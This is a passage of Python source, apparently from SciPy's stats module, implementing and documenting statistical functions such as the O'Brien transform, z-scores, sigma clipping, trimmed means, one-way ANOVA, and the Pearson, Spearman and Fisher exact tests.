    >>> res = stats.relfreq(a, numbins=4)
    >>> res.frequency
    array([ 0.16666667, 0.5       , 0.16666667,  0.16666667])
    >>> np.sum(res.frequency)  # relative frequencies should add up to 1
    1.0

    """
    a = np.asanyarray(a)

    # Bin once, then normalize the counts by the total number of
    # observations along the first axis.
    counts, lowerlimit, binsize, extrapoints = histogram(
        a, numbins, defaultreallimits, weights=weights)
    frequency = counts / float(a.shape[0])

    RelfreqResult = namedtuple('RelfreqResult', ('frequency', 'lowerlimit',
                                                 'binsize', 'extrapoints'))
    return RelfreqResult(frequency, lowerlimit, binsize, extrapoints)
#####################################
# VARIABILITY FUNCTIONS #
#####################################
def obrientransform(*args):
    """
    Computes the O'Brien transform on input data (any number of arrays).

    Used to test for homogeneity of variance prior to running one-way stats.
    Each array in ``*args`` is one level of a factor.  If `f_oneway` is run
    on the transformed data and found significant, the variances are unequal.
    From Maxwell and Delaney [1]_, p.112.

    Parameters
    ----------
    args : tuple of array_like
        Any number of arrays.

    Returns
    -------
    obrientransform : ndarray
        Transformed data for use in an ANOVA.  The first dimension of the
        result corresponds to the sequence of transformed arrays.  If the
        arrays given are all 1-D of the same length, the return value is a
        2-D array; otherwise it is a 1-D array of type object, with each
        element being an ndarray.

    References
    ----------
    .. [1] S. E. Maxwell and H. D. Delaney, "Designing Experiments and
           Analyzing Data: A Model Comparison Perspective", Wadsworth, 1990.

    Examples
    --------
    >>> x = [10, 11, 13, 9, 7, 12, 12, 9, 10]
    >>> y = [13, 21, 5, 10, 8, 14, 10, 12, 7, 15]
    >>> from scipy.stats import obrientransform
    >>> tx, ty = obrientransform(x, y)
    >>> from scipy.stats import f_oneway
    >>> F, p = f_oneway(tx, ty)
    >>> p
    0.1314139477040335
    """
    # Tolerance for the mean-vs-variance consistency check below.
    TINY = np.sqrt(np.finfo(float).eps)

    # Transformed copies of each input sample.
    transformed = []
    for sample in args:
        x = np.asarray(sample)
        n = len(x)
        centered_sq = (x - np.mean(x)) ** 2
        total_sq = centered_sq.sum()

        # The O'Brien transform.
        t = ((n - 1.5) * n * centered_sq - 0.5 * total_sq) / ((n - 1) * (n - 2))

        # Sanity check: the mean of the transformed data must equal the
        # original sample variance.
        if abs(total_sq / (n - 1) - np.mean(t)) > TINY:
            raise ValueError('Lack of convergence in obrientransform.')

        transformed.append(t)

    # If the samples differ in shape, np.array would build (or, on very old
    # numpy, fail to build) an object array; request dtype=object explicitly
    # in that case so the behavior is deterministic.
    if len(transformed) < 2 or all(t.shape == transformed[0].shape
                                   for t in transformed[1:]):
        dtype = None
    else:
        dtype = object

    return np.array(transformed, dtype=dtype)
@np.deprecate(message="scipy.stats.signaltonoise is deprecated in scipy 0.16.0")
def signaltonoise(a, axis=0, ddof=0):
    """
    The signal-to-noise ratio of the input data.

    Returns the signal-to-noise ratio of `a`, here defined as the mean
    divided by the standard deviation.

    Parameters
    ----------
    a : array_like
        An array_like object containing the sample data.
    axis : int or None, optional
        Axis along which to operate. Default is 0. If None, compute over
        the whole array `a`.
    ddof : int, optional
        Degrees of freedom correction for standard deviation. Default is 0.

    Returns
    -------
    s2n : ndarray
        The mean to standard deviation ratio(s) along `axis`, or 0 where the
        standard deviation is 0.
    """
    arr = np.asanyarray(a)
    mean = arr.mean(axis)
    std = arr.std(axis=axis, ddof=ddof)
    # Where the standard deviation vanishes, report 0 rather than inf/nan.
    return np.where(std == 0, 0, mean / std)
def sem(a, axis=0, ddof=1, nan_policy='propagate'):
    """
    Calculates the standard error of the mean (or standard error of
    measurement) of the values in the input array.

    Parameters
    ----------
    a : array_like
        An array containing the values for which the standard error is
        returned.
    axis : int or None, optional
        Axis along which to operate. Default is 0. If None, compute over
        the whole array `a`.
    ddof : int, optional
        Delta degrees-of-freedom. How many degrees of freedom to adjust
        for bias in limited samples relative to the population estimate
        of variance. Defaults to 1.
    nan_policy : {'propagate', 'raise', 'omit'}, optional
        Defines how to handle when input contains nan. 'propagate' returns
        nan, 'raise' throws an error, 'omit' performs the calculations
        ignoring nan values. Default is 'propagate'.

    Returns
    -------
    s : ndarray or float
        The standard error of the mean in the sample(s), along the input
        axis.

    Notes
    -----
    The default value for `ddof` is different to the default (0) used by
    other ddof containing routines, such as np.std and stats.nanstd.

    Examples
    --------
    >>> from scipy import stats
    >>> a = np.arange(20).reshape(5,4)
    >>> stats.sem(a)
    array([ 2.8284,  2.8284,  2.8284,  2.8284])
    >>> stats.sem(a, axis=None, ddof=0)
    1.2893796958227628
    """
    a, axis = _chk_asarray(a, axis)

    contains_nan, nan_policy = _contains_nan(a, nan_policy)
    if contains_nan:
        # Delegate the nan-aware computation to the masked-array version.
        if nan_policy == 'omit':
            return mstats_basic.sem(ma.masked_invalid(a), axis, ddof)
        if nan_policy == 'propagate':
            return np.nan

    n = a.shape[axis]
    return np.std(a, axis=axis, ddof=ddof) / np.sqrt(n)
def zscore(a, axis=0, ddof=0):
    """
    Calculates the z score of each value in the sample, relative to the
    sample mean and standard deviation.

    Parameters
    ----------
    a : array_like
        An array like object containing the sample data.
    axis : int or None, optional
        Axis along which to operate. Default is 0. If None, compute over
        the whole array `a`.
    ddof : int, optional
        Degrees of freedom correction in the calculation of the
        standard deviation. Default is 0.

    Returns
    -------
    zscore : array_like
        The z-scores, standardized by mean and standard deviation of input
        array `a`.

    Notes
    -----
    This function preserves ndarray subclasses, and works also with
    matrices and masked arrays (it uses `asanyarray` instead of `asarray`
    for parameters).

    Examples
    --------
    >>> a = np.array([ 0.7972,  0.0767,  0.4383,  0.7866,  0.8091,  0.1954,
    ...                0.6307,  0.6599,  0.1065,  0.0508])
    >>> from scipy import stats
    >>> stats.zscore(a)
    array([ 1.1273, -1.247 , -0.0552,  1.0923,  1.1664, -0.8559,  0.5786,
            0.6748, -1.1488, -1.3324])
    """
    arr = np.asanyarray(a)
    mean = arr.mean(axis=axis)
    std = arr.std(axis=axis, ddof=ddof)
    # Reducing over a nonzero axis drops that dimension, so the statistics
    # must be re-expanded to broadcast against `arr`.  For axis=0 or
    # axis=None they broadcast directly.
    if axis and mean.ndim < arr.ndim:
        mean = np.expand_dims(mean, axis=axis)
        std = np.expand_dims(std, axis=axis)
    return (arr - mean) / std
def zmap(scores, compare, axis=0, ddof=0):
    """
    Calculates the relative z-scores.

    Returns an array of z-scores, i.e., scores that are standardized to
    zero mean and unit variance, where mean and variance are calculated
    from the comparison array.

    Parameters
    ----------
    scores : array_like
        The input for which z-scores are calculated.
    compare : array_like
        The input from which the mean and standard deviation of the
        normalization are taken; assumed to have the same dimension as
        `scores`.
    axis : int or None, optional
        Axis over which mean and variance of `compare` are calculated.
        Default is 0. If None, compute over the whole array `scores`.
    ddof : int, optional
        Degrees of freedom correction in the calculation of the
        standard deviation. Default is 0.

    Returns
    -------
    zscore : array_like
        Z-scores, in the same shape as `scores`.

    Notes
    -----
    This function preserves ndarray subclasses, and works also with
    matrices and masked arrays (it uses `asanyarray` instead of `asarray`
    for parameters).

    Examples
    --------
    >>> from scipy.stats import zmap
    >>> a = [0.5, 2.0, 2.5, 3]
    >>> b = [0, 1, 2, 3, 4]
    >>> zmap(a, b)
    array([-1.06066017,  0.        ,  0.35355339,  0.70710678])
    """
    scores = np.asanyarray(scores)
    compare = np.asanyarray(compare)
    mean = compare.mean(axis=axis)
    std = compare.std(axis=axis, ddof=ddof)
    # Re-insert the reduced dimension so the statistics broadcast against
    # `scores` when normalizing over a nonzero axis.
    if axis and mean.ndim < compare.ndim:
        mean = np.expand_dims(mean, axis=axis)
        std = np.expand_dims(std, axis=axis)
    return (scores - mean) / std
#####################################
# TRIMMING FUNCTIONS #
#####################################
@np.deprecate(message="stats.threshold is deprecated in scipy 0.17.0")
def threshold(a, threshmin=None, threshmax=None, newval=0):
    """
    Clip array to a given value.

    Similar to numpy.clip(), except that values less than `threshmin` or
    greater than `threshmax` are replaced by `newval`, instead of by
    `threshmin` and `threshmax` respectively.

    Parameters
    ----------
    a : array_like
        Data to threshold.
    threshmin : float, int or None, optional
        Minimum threshold, defaults to None.
    threshmax : float, int or None, optional
        Maximum threshold, defaults to None.
    newval : float or int, optional
        Value to put in place of values in `a` outside of bounds.
        Defaults to 0.

    Returns
    -------
    out : ndarray
        The clipped input array, with values less than `threshmin` or
        greater than `threshmax` replaced with `newval`.

    Examples
    --------
    >>> a = np.array([9, 9, 6, 3, 1, 6, 1, 0, 0, 8])
    >>> from scipy import stats
    >>> stats.threshold(a, threshmin=2, threshmax=8, newval=-1)
    array([-1, -1,  6,  3, -1,  6, -1, -1, -1,  8])
    """
    out = asarray(a).copy()
    # Build the mask of out-of-bounds positions; an omitted bound is simply
    # not checked.
    outside = zeros(out.shape, dtype=bool)
    if threshmin is not None:
        outside |= out < threshmin
    if threshmax is not None:
        outside |= out > threshmax
    out[outside] = newval
    return out
def sigmaclip(a, low=4., high=4.):
    """
    Iterative sigma-clipping of array elements.

    The output array contains only those elements of the input array `c`
    that satisfy the conditions ::

        mean(c) - std(c)*low < c < mean(c) + std(c)*high

    Starting from the full sample, all elements outside the critical range
    are removed. The iteration continues with a new critical range until no
    elements are outside the range.

    Parameters
    ----------
    a : array_like
        Data array, will be raveled if not 1-D.
    low : float, optional
        Lower bound factor of sigma clipping. Default is 4.
    high : float, optional
        Upper bound factor of sigma clipping. Default is 4.

    Returns
    -------
    clipped : ndarray
        Input array with clipped elements removed.
    lower : float
        Lower threshold value use for clipping.
    upper : float
        Upper threshold value use for clipping.

    Examples
    --------
    >>> from scipy.stats import sigmaclip
    >>> a = np.concatenate((np.linspace(9.5, 10.5, 11),
    ...                     np.linspace(-100, -50, 3)))
    >>> c, low, upp = sigmaclip(a, 1.8, 1.8)
    >>> (c == np.linspace(9.5, 10.5, 11)).all()
    True
    """
    clipped = np.asarray(a).ravel()
    # Repeatedly tighten the critical range until no further element is
    # removed.
    while True:
        mean = clipped.mean()
        std = clipped.std()
        critlower = mean - std * low
        critupper = mean + std * high
        survivors = clipped[(clipped > critlower) & (clipped < critupper)]
        converged = survivors.size == clipped.size
        clipped = survivors
        if converged:
            break
    SigmaclipResult = namedtuple('SigmaclipResult', ('clipped', 'lower',
                                                     'upper'))
    return SigmaclipResult(clipped, critlower, critupper)
def trimboth(a, proportiontocut, axis=0):
    """
    Slices off a proportion of items from both ends of an array.

    Slices off the passed proportion of items from both ends of the passed
    array (i.e., with `proportiontocut` = 0.1, slices leftmost 10% **and**
    rightmost 10% of scores). The trimmed values are the lowest and
    highest ones.

    Slices off less if proportion results in a non-integer slice index
    (i.e., conservatively slices off `proportiontocut`).

    Parameters
    ----------
    a : array_like
        Data to trim.
    proportiontocut : float
        Proportion (in range 0-1) of total data set to trim of each end.
    axis : int or None, optional
        Axis along which to trim data. Default is 0. If None, compute over
        the whole array `a`.

    Returns
    -------
    out : ndarray
        Trimmed version of array `a`. The order of the trimmed content
        is undefined.

    Raises
    ------
    ValueError
        If trimming `proportiontocut` from both ends would leave no data.

    See Also
    --------
    trim_mean

    Examples
    --------
    >>> from scipy import stats
    >>> a = np.arange(20)
    >>> b = stats.trimboth(a, 0.1)
    >>> b.shape
    (16,)
    """
    a = np.asarray(a)

    if a.size == 0:
        return a

    if axis is None:
        a = a.ravel()
        axis = 0

    nobs = a.shape[axis]
    lowercut = int(proportiontocut * nobs)
    uppercut = nobs - lowercut
    if (lowercut >= uppercut):
        raise ValueError("Proportion too big.")

    # np.partition is preferred but it only exist in numpy 1.8.0 and higher,
    # in those cases we use np.sort
    try:
        atmp = np.partition(a, (lowercut, uppercut - 1), axis)
    except AttributeError:
        atmp = np.sort(a, axis)

    sl = [slice(None)] * atmp.ndim
    sl[axis] = slice(lowercut, uppercut)
    # Index with a tuple: indexing with a list of slices is deprecated in
    # NumPy and raises an error in recent versions.
    return atmp[tuple(sl)]
def trim1(a, proportiontocut, tail='right', axis=0):
    """
    Slices off a proportion from ONE end of the passed array distribution.

    If `proportiontocut` = 0.1, slices off 'leftmost' or 'rightmost'
    10% of scores. The lowest or highest values are trimmed (depending on
    the tail).

    Slices off less if proportion results in a non-integer slice index
    (i.e., conservatively slices off `proportiontocut` ).

    Parameters
    ----------
    a : array_like
        Input array
    proportiontocut : float
        Fraction to cut off of 'left' or 'right' of distribution
    tail : {'left', 'right'}, optional
        Defaults to 'right'.
    axis : int or None, optional
        Axis along which to trim data. Default is 0. If None, compute over
        the whole array `a`.

    Returns
    -------
    trim1 : ndarray
        Trimmed version of array `a`. The order of the trimmed content is
        undefined.

    Raises
    ------
    ValueError
        If `tail` is neither 'left' nor 'right'.
    """
    a = np.asarray(a)

    # Validate `tail` up front: previously an invalid value fell through
    # and raised an obscure NameError further down.
    side = tail.lower()
    if side not in ('left', 'right'):
        raise ValueError("tail must be 'left' or 'right'")

    if axis is None:
        a = a.ravel()
        axis = 0

    nobs = a.shape[axis]

    # avoid possible corner case
    if proportiontocut >= 1:
        return []

    if side == 'right':
        lowercut = 0
        uppercut = nobs - int(proportiontocut * nobs)
    else:  # 'left'
        lowercut = int(proportiontocut * nobs)
        uppercut = nobs

    # np.partition is preferred but it only exist in numpy 1.8.0 and higher,
    # in those cases we use np.sort
    try:
        atmp = np.partition(a, (lowercut, uppercut - 1), axis)
    except AttributeError:
        atmp = np.sort(a, axis)

    # Slice along the trimming axis: the previous code always sliced axis 0,
    # returning wrong results for axis != 0.  Index with a tuple because
    # list-of-slices indexing is rejected by recent NumPy.
    sl = [slice(None)] * atmp.ndim
    sl[axis] = slice(lowercut, uppercut)
    return atmp[tuple(sl)]
def trim_mean(a, proportiontocut, axis=0):
    """
    Return mean of array after trimming distribution from both tails.

    If `proportiontocut` = 0.1, slices off 'leftmost' and 'rightmost' 10% of
    scores. The input is sorted before slicing. Slices off less if proportion
    results in a non-integer slice index (i.e., conservatively slices off
    `proportiontocut` ).

    Parameters
    ----------
    a : array_like
        Input array
    proportiontocut : float
        Fraction to cut off of both tails of the distribution
    axis : int or None, optional
        Axis along which the trimmed means are computed. Default is 0.
        If None, compute over the whole array `a`.

    Returns
    -------
    trim_mean : ndarray
        Mean of trimmed array.

    Raises
    ------
    ValueError
        If trimming `proportiontocut` from both ends would leave no data.

    See Also
    --------
    trimboth
    tmean : compute the trimmed mean ignoring values outside given `limits`.

    Examples
    --------
    >>> from scipy import stats
    >>> x = np.arange(20)
    >>> stats.trim_mean(x, 0.1)
    9.5
    >>> x2 = x.reshape(5, 4)
    >>> stats.trim_mean(x2, 0.25)
    array([  8.,   9.,  10.,  11.])
    >>> stats.trim_mean(x2, 0.25, axis=1)
    array([  1.5,   5.5,   9.5,  13.5,  17.5])
    """
    a = np.asarray(a)

    if a.size == 0:
        return np.nan

    if axis is None:
        a = a.ravel()
        axis = 0

    nobs = a.shape[axis]
    lowercut = int(proportiontocut * nobs)
    uppercut = nobs - lowercut
    if (lowercut > uppercut):
        raise ValueError("Proportion too big.")

    # np.partition is preferred but it only exist in numpy 1.8.0 and higher,
    # in those cases we use np.sort
    try:
        atmp = np.partition(a, (lowercut, uppercut - 1), axis)
    except AttributeError:
        atmp = np.sort(a, axis)

    sl = [slice(None)] * atmp.ndim
    sl[axis] = slice(lowercut, uppercut)
    # Index with a tuple: indexing with a list of slices is deprecated in
    # NumPy and raises an error in recent versions.
    return np.mean(atmp[tuple(sl)], axis=axis)
def f_oneway(*args):
    """
    Performs a 1-way ANOVA.

    The one-way ANOVA tests the null hypothesis that two or more groups
    have the same population mean.  The test is applied to samples from two
    or more groups, possibly with differing sizes.

    Parameters
    ----------
    sample1, sample2, ... : array_like
        The sample measurements for each group.

    Returns
    -------
    statistic : float
        The computed F-value of the test.
    pvalue : float
        The associated p-value from the F-distribution.

    Notes
    -----
    The ANOVA test has important assumptions that must be satisfied in
    order for the associated p-value to be valid.

    1. The samples are independent.
    2. Each sample is from a normally distributed population.
    3. The population standard deviations of the groups are all equal.
       This property is known as homoscedasticity.

    If these assumptions are not true for a given set of data, it may
    still be possible to use the Kruskal-Wallis H-test
    (`scipy.stats.kruskal`) although with some loss of power.

    The algorithm is from Heiman[2], pp.394-7.

    References
    ----------
    .. [1] Lowry, Richard.  "Concepts and Applications of Inferential
           Statistics". Chapter 14.
           http://faculty.vassar.edu/lowry/ch14pt1.html
    .. [2] Heiman, G.W.  Research Methods in Statistics. 2002.
    .. [3] McDonald, G. H. "Handbook of Biological Statistics", One-way
           ANOVA. http://www.biostathandbook.com/onewayanova.html

    Examples
    --------
    >>> import scipy.stats as stats
    >>> tillamook = [0.0571, 0.0813, 0.0831, 0.0976, 0.0817, 0.0859, 0.0735,
    ...              0.0659, 0.0923, 0.0836]
    >>> newport = [0.0873, 0.0662, 0.0672, 0.0819, 0.0749, 0.0649, 0.0835,
    ...            0.0725]
    >>> petersburg = [0.0974, 0.1352, 0.0817, 0.1016, 0.0968, 0.1064, 0.105]
    >>> magadan = [0.1033, 0.0915, 0.0781, 0.0685, 0.0677, 0.0697, 0.0764,
    ...            0.0689]
    >>> tvarminne = [0.0703, 0.1026, 0.0956, 0.0973, 0.1039, 0.1045]
    >>> stats.f_oneway(tillamook, newport, petersburg, magadan, tvarminne)
    F_onewayResult(statistic=7.1210194716424473, pvalue=0.00028122423145345439)
    """
    samples = [np.asarray(sample, dtype=float) for sample in args]
    num_groups = len(samples)
    alldata = np.concatenate(samples)
    bign = len(alldata)

    # Center every value on the grand mean before the sum-of-squares
    # computations.  Variance is invariant to a shift in location, and
    # working with centered data vastly improves numerical stability.
    grand_mean = alldata.mean()
    alldata -= grand_mean

    # Total sum of squares, then the "between treatments" component; the
    # "within treatments" part is the remainder.
    sstot = _sum_of_squares(alldata) - (_square_of_sums(alldata) / float(bign))
    ssbn = 0
    for sample in samples:
        ssbn += _square_of_sums(sample - grand_mean) / float(len(sample))
    ssbn -= (_square_of_sums(alldata) / float(bign))
    sswn = sstot - ssbn

    # Degrees of freedom and mean squares.
    dfbn = num_groups - 1
    dfwn = bign - num_groups
    msb = ssbn / float(dfbn)
    msw = sswn / float(dfwn)
    f = msb / msw

    prob = special.fdtrc(dfbn, dfwn, f)  # equivalent to stats.f.sf

    F_onewayResult = namedtuple('F_onewayResult', ('statistic', 'pvalue'))
    return F_onewayResult(f, prob)
def pearsonr(x, y):
    """
    Calculates a Pearson correlation coefficient and the p-value for
    testing non-correlation.

    The Pearson correlation coefficient measures the linear relationship
    between two datasets.  Strictly speaking, Pearson's correlation
    requires that each dataset be normally distributed.  Like other
    correlation coefficients, this one varies between -1 and +1 with 0
    implying no correlation.  Correlations of -1 or +1 imply an exact
    linear relationship.  Positive correlations imply that as x increases,
    so does y.  Negative correlations imply that as x increases, y
    decreases.

    The p-value roughly indicates the probability of an uncorrelated
    system producing datasets that have a Pearson correlation at least as
    extreme as the one computed from these datasets.  The p-values are not
    entirely reliable but are probably reasonable for datasets larger than
    500 or so.

    Parameters
    ----------
    x : (N,) array_like
        Input
    y : (N,) array_like
        Input

    Returns
    -------
    (Pearson's correlation coefficient,
     2-tailed p-value)

    References
    ----------
    http://www.statsoft.com/textbook/glosp.html#Pearson%20Correlation
    """
    # x and y should have same length.
    x = np.asarray(x)
    y = np.asarray(y)
    n = len(x)

    # Center both inputs, then form the correlation as the ratio of the
    # cross-product to the geometric mean of the sums of squares.
    xm = x - x.mean()
    ym = y - y.mean()
    num = np.add.reduce(xm * ym)
    den = np.sqrt(_sum_of_squares(xm) * _sum_of_squares(ym))
    r = num / den

    # |r| > 1 can only be a tiny floating-point artifact; clamp to [-1, 1].
    r = max(min(r, 1.0), -1.0)

    df = n - 2
    if abs(r) == 1.0:
        # Exact linear relationship: p-value is zero by definition.
        prob = 0.0
    else:
        # Two-sided p-value via the t distribution with n-2 df, expressed
        # through the incomplete beta function.
        t_squared = r**2 * (df / ((1.0 - r) * (1.0 + r)))
        prob = _betai(0.5*df, 0.5, df/(df+t_squared))

    return r, prob
def fisher_exact(table, alternative='two-sided'):
    """Performs a Fisher exact test on a 2x2 contingency table.
    Parameters
    ----------
    table : array_like of ints
        A 2x2 contingency table. Elements should be non-negative integers.
    alternative : {'two-sided', 'less', 'greater'}, optional
        Which alternative hypothesis to the null hypothesis the test uses.
        Default is 'two-sided'.
    Returns
    -------
    oddsratio : float
        This is prior odds ratio and not a posterior estimate.
    p_value : float
        P-value, the probability of obtaining a distribution at least as
        extreme as the one that was actually observed, assuming that the
        null hypothesis is true.
    See Also
    --------
    chi2_contingency : Chi-square test of independence of variables in a
        contingency table.
    Notes
    -----
    The calculated odds ratio is different from the one R uses. This scipy
    implementation returns the (more common) "unconditional Maximum
    Likelihood Estimate", while R uses the "conditional Maximum Likelihood
    Estimate".
    For tables with large numbers, the (inexact) chi-square test implemented
    in the function `chi2_contingency` can also be used.
    Examples
    --------
    Say we spend a few days counting whales and sharks in the Atlantic and
    Indian oceans. In the Atlantic ocean we find 8 whales and 1 shark, in the
    Indian ocean 2 whales and 5 sharks. Then our contingency table is::
                Atlantic  Indian
        whales     8        2
        sharks     1        5
    We use this table to find the p-value:
    >>> import scipy.stats as stats
    >>> oddsratio, pvalue = stats.fisher_exact([[8, 2], [1, 5]])
    >>> pvalue
    0.0349...
    The probability that we would observe this or an even more imbalanced ratio
    by chance is about 3.5%. A commonly used significance level is 5%--if we
    adopt that, we can therefore conclude that our observed imbalance is
    statistically significant; whales prefer the Atlantic while sharks prefer
    the Indian ocean.
    """
    hypergeom = distributions.hypergeom
    c = np.asarray(table, dtype=np.int64)  # int32 is not enough for the algorithm
    if not c.shape == (2, 2):
        raise ValueError("The input `table` must be of shape (2, 2).")
    if np.any(c < 0):
        raise ValueError("All values in `table` must be nonnegative.")
    if 0 in c.sum(axis=0) or 0 in c.sum(axis=1):
        # If both values in a row or column are zero, the p-value is 1 and
        # the odds ratio is NaN.
        return np.nan, 1.0
    # Unconditional MLE odds ratio; infinite when either off-diagonal cell
    # is zero (division by zero case handled explicitly).
    if c[1,0] > 0 and c[0,1] > 0:
        oddsratio = c[0,0] * c[1,1] / float(c[1,0] * c[0,1])
    else:
        oddsratio = np.inf
    # Marginals of the table: row sums (n1, n2) and first-column sum (n).
    n1 = c[0,0] + c[0,1]
    n2 = c[1,0] + c[1,1]
    n = c[0,0] + c[1,0]
    # NOTE: this helper closes over `mode`, `pexact` and `epsilon`, which
    # are only assigned inside the 'two-sided' branch below.  It must not
    # be called from any other branch.
    def binary_search(n, n1, n2, side):
        """Binary search for where to begin lower/upper halves in two-sided
        test.
        """
        # Search between the hypergeometric mode and the relevant end of
        # the support for the first value whose pmf crosses `pexact`.
        if side == "upper":
            minval = mode
            maxval = n
        else:
            minval = 0
            maxval = mode
        guess = -1
        while maxval - minval > 1:
            if maxval == minval + 1 and guess == minval:
                guess = maxval
            else:
                guess = (maxval + minval) // 2
            pguess = hypergeom.pmf(guess, n1 + n2, n1, n)
            if side == "upper":
                ng = guess - 1
            else:
                ng = guess + 1
            # Stop when pexact is bracketed between pmf(guess) and pmf(ng).
            if pguess <= pexact < hypergeom.pmf(ng, n1 + n2, n1, n):
                break
            elif pguess < pexact:
                maxval = guess
            else:
                minval = guess
        if guess == -1:
            guess = minval
        # Nudge the guess by single steps to compensate for floating-point
        # noise, using the `epsilon` tolerance around pexact.
        if side == "upper":
            while guess > 0 and hypergeom.pmf(guess, n1 + n2, n1, n) < pexact * epsilon:
                guess -= 1
            while hypergeom.pmf(guess, n1 + n2, n1, n) > pexact / epsilon:
                guess += 1
        else:
            while hypergeom.pmf(guess, n1 + n2, n1, n) < pexact * epsilon:
                guess += 1
            while guess > 0 and hypergeom.pmf(guess, n1 + n2, n1, n) > pexact / epsilon:
                guess -= 1
        return guess
    if alternative == 'less':
        pvalue = hypergeom.cdf(c[0,0], n1 + n2, n1, n)
    elif alternative == 'greater':
        # Same formula as the 'less' case, but with the second column.
        pvalue = hypergeom.cdf(c[0,1], n1 + n2, n1, c[0,1] + c[1,1])
    elif alternative == 'two-sided':
        # Mode of the hypergeometric distribution for these marginals.
        mode = int(float((n + 1) * (n1 + 1)) / (n1 + n2 + 2))
        pexact = hypergeom.pmf(c[0,0], n1 + n2, n1, n)
        pmode = hypergeom.pmf(mode, n1 + n2, n1, n)
        # Relative tolerance used when comparing pmf values.
        epsilon = 1 - 1e-4
        if np.abs(pexact - pmode) / np.maximum(pexact, pmode) <= 1 - epsilon:
            # Observed value is (numerically) at the mode: p-value is 1.
            return oddsratio, 1.
        elif c[0,0] < mode:
            # Observed count below the mode: sum the lower tail, then find
            # where the upper tail starts contributing comparable mass.
            plower = hypergeom.cdf(c[0,0], n1 + n2, n1, n)
            if hypergeom.pmf(n, n1 + n2, n1, n) > pexact / epsilon:
                return oddsratio, plower
            guess = binary_search(n, n1, n2, "upper")
            pvalue = plower + hypergeom.sf(guess - 1, n1 + n2, n1, n)
        else:
            # Observed count at or above the mode: mirror of the case above.
            pupper = hypergeom.sf(c[0,0] - 1, n1 + n2, n1, n)
            if hypergeom.pmf(0, n1 + n2, n1, n) > pexact / epsilon:
                return oddsratio, pupper
            guess = binary_search(n, n1, n2, "lower")
            pvalue = pupper + hypergeom.cdf(guess, n1 + n2, n1, n)
    else:
        msg = "`alternative` should be one of {'two-sided', 'less', 'greater'}"
        raise ValueError(msg)
    # Tail sums can slightly exceed 1 from rounding; clamp.
    if pvalue > 1.0:
        pvalue = 1.0
    return oddsratio, pvalue
def spearmanr(a, b=None, axis=0, nan_policy='propagate'):
    """
    Calculates a Spearman rank-order correlation coefficient and the
    p-value to test for non-correlation.

    The Spearman correlation is a nonparametric measure of the
    monotonicity of the relationship between two datasets.  Unlike the
    Pearson correlation, the Spearman correlation does not assume that
    both datasets are normally distributed.  Like other correlation
    coefficients, this one varies between -1 and +1 with 0 implying no
    correlation.  Correlations of -1 or +1 imply an exact monotonic
    relationship.  Positive correlations imply that as x increases, so
    does y.  Negative correlations imply that as x increases, y decreases.

    The p-value roughly indicates the probability of an uncorrelated
    system producing datasets that have a Spearman correlation at least as
    extreme as the one computed from these datasets.  The p-values are not
    entirely reliable but are probably reasonable for datasets larger than
    500 or so.

    Parameters
    ----------
    a, b : 1D or 2D array_like, b is optional
        One or two 1-D or 2-D arrays containing multiple variables and
        observations.  When these are 1-D, each represents a vector of
        observations of a single variable.  For the behavior in the 2-D
        case, see under ``axis``, below.  Both arrays need to have the
        same length in the ``axis`` dimension.
    axis : int or None, optional
        If axis=0 (default), then each column represents a variable, with
        observations in the rows.  If axis=1, the relationship is
        transposed: each row represents a variable, while the columns
        contain observations.  If axis=None, then both arrays will be
        raveled.
    nan_policy : {'propagate', 'raise', 'omit'}, optional
        Defines how to handle when input contains nan. 'propagate' returns
        nan, 'raise' throws an error, 'omit' performs the calculations
        ignoring nan values. Default is 'propagate'.

    Returns
    -------
    correlation : float or ndarray (2-D square)
        Spearman correlation matrix or correlation coefficient (if only 2
        variables are given as parameters.  Correlation matrix is square
        with length equal to total number of variables (columns or rows)
        in a and b combined.
    pvalue : float
        The two-sided p-value for a hypothesis test whose null hypothesis
        is that two sets of data are uncorrelated, has same dimension as
        rho.

    Notes
    -----
    Changes in scipy 0.8.0: rewrite to add tie-handling, and axis.

    References
    ----------
    .. [1] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
       Probability and Statistics Tables and Formulae. Chapman & Hall: New
       York. 2000.  Section 14.7

    Examples
    --------
    >>> from scipy import stats
    >>> stats.spearmanr([1,2,3,4,5], [5,6,7,8,7])
    (0.82078268166812329, 0.088587005313543798)
    """
    a, axisout = _chk_asarray(a, axis)
    SpearmanrResult = namedtuple('SpearmanrResult', ('correlation', 'pvalue'))

    # nan handling for the first input.
    contains_nan, nan_policy = _contains_nan(a, nan_policy)
    if contains_nan:
        if nan_policy == 'omit':
            # Delegate to the masked-array implementation.
            return mstats_basic.spearmanr(ma.masked_invalid(a),
                                          ma.masked_invalid(b), axis)
        if nan_policy == 'propagate':
            return SpearmanrResult(np.nan, np.nan)

    if a.size <= 1:
        # Correlation is undefined for fewer than two observations.
        return SpearmanrResult(np.nan, np.nan)

    ar = np.apply_along_axis(rankdata, axisout, a)

    br = None
    if b is not None:
        b, axisout = _chk_asarray(b, axis)

        # nan handling for the second input.
        contains_nan, nan_policy = _contains_nan(b, nan_policy)
        if contains_nan:
            if nan_policy == 'omit':
                return mstats_basic.spearmanr(a, ma.masked_invalid(b), axis)
            if nan_policy == 'propagate':
                return SpearmanrResult(np.nan, np.nan)

        br = np.apply_along_axis(rankdata, axisout, b)

    n = a.shape[axisout]
    rs = np.corrcoef(ar, br, rowvar=axisout)

    olderr = np.seterr(divide='ignore')  # rs can have elements equal to 1
    try:
        t = rs * np.sqrt((n-2) / ((rs+1.0)*(1.0-rs)))
    finally:
        np.seterr(**olderr)

    prob = 2 * distributions.t.sf(np.abs(t), n-2)

    if rs.shape == (2, 2):
        # Exactly two variables: return scalars instead of 2x2 matrices.
        return SpearmanrResult(rs[1, 0], prob[1, 0])
    return SpearmanrResult(rs, prob)
def pointbiserialr(x, y):
    r"""
    Calculates a point biserial correlation coefficient and its p-value.

    The point biserial correlation is used to measure the relationship
    between a binary variable, x, and a continuous variable, y. Like other
    correlation coefficients, this one varies between -1 and +1 with 0
    implying no correlation. Correlations of -1 or +1 imply a determinative
    relationship.

    This function uses a shortcut formula but produces the same result as
    `pearsonr`.

    Parameters
    ----------
    x : array_like of bools
        Input array.
    y : array_like
        Input array.

    Returns
    -------
    correlation : float
        R value
    pvalue : float
        2-tailed p-value

    Notes
    -----
    `pointbiserialr` uses a t-test with ``n-1`` degrees of freedom.
    It is equivalent to `pearsonr.`

    The value of the point-biserial correlation can be calculated from:

    .. math::

        r_{pb} = \frac{\overline{Y_{1}} -
                 \overline{Y_{0}}}{s_{y}}\sqrt{\frac{N_{1} N_{2}}{N (N - 1))}}

    Where :math:`Y_{0}` and :math:`Y_{1}` are means of the metric
